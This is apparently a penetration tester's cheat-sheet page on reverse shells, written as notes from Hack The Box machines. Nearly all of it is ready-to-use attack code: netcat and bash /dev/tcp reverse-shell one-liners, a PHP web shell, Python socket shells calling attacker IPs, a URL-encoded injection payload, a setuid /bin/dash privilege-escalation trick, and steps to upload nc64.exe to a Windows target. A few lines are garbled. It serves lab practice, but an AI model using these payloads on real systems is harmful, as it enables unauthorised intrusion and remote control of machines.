Shells

Broad Topic

Links

Basics

  • Host: Setup the listener to catch the reverse shell

    • nc -nvlp 1234

  • Target: Upload your reverse shell, navigate, execute, connect

  • Example: BashedHTB sends a php reverse shell with wget

Easy Test Connect

nc -e /bin/bash $IP 4444
netcat -e /bin/bash $MyIP 4444
bash -i >& /dev/tcp/$MyIP/4444 0>&1

nc -nlvp 4444

PHP web shell

  • Upload this simple 'shell.php', and call it using parameter 'cmd=uname'

  • Consider, you might need to send 'shell.php3' to avoid the block/filter.

  • REF: PhpTricks, FtpHttpVuln

<?php
  system($_GET["cmd"]);
?>

Execute:
http://abc.so/upload/shell.php?cmd=uname -a

Python

#!/usr/bin/env python
import os
import sys
try: 
    #os.system('/usr/bin/touch /tmp/hello')              ...test
    #os.system('bash -i /dev/tcp/$MyIP/4444 0>&1')       ...reverse shell
    os.system('chmod 4755 /bin/dash')                    ...rootbash
except:
    sys.exit()
This worked for htb-bashed:
Root process auto-executes python scripts:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.15",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
Script:
http://10.10.10.168:8080/

import socket,subprocess,os bs; 
socket.socket(socket.AF_INET,socket.SOCK_STREAM);
ns.connect(("10.10.15.30",51000));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")# 
HTTP/1.1



Bash Script/Shell (privesc)

#!/usr/bin/python
import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.52",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

By Burp

Readable:
/'\nimport socket,subprocess,os;\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\ns.connect((\"10.10.15.30\",51000));\nos.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);\nimport pty;\npty.spawn(\"/bin/bash\")#

Web-Encoded:
/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1

Browser

http://10.10.10.168:8080/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1
--Remember to include the HTTP/1.1

Bash Reverse

bash -i >& /dev/tcp/192.168.1.26/53 0>&1

payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'

Powershell Reverse

netcat

  • Create a python reverse shell

  • Listener #1: Share rshell with <

  • Listener #2: Wait for incoming

  • LFI: Execute nc to pickup rshell and execute it

rce > nc > python > nc/rshell

Python Reverse Shell
vim cmd  ..connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd   ..send/share the file
nc -nvlp 1234         ..catch shell
..queues;nc+10.10.10.6+9001|python+&   ..fail
..queues;nc+10.10.10.6+9001|python     ..ok pull file, python execute
connected!

Windows netcat

  • Windows Target might not have netcat

  • Download and send the nc64.exe (assuming they are using 64bit)

  • Execute your nc64.exe to send a ReverseShell back to yourself

  • Ex: DrupalPhpVuln

Download 64-bit netcat
nc64.exe: upload and execute

http://10.x.x.x/ippsec.php?fupload=nc64.exe
http://10.x.x.x/ippsec.php?fexec=nc64.exe -e cmd $MyIP 8081
nc -nvlp 8081

PreviousPowerShell EmpireNextrpc

Last updated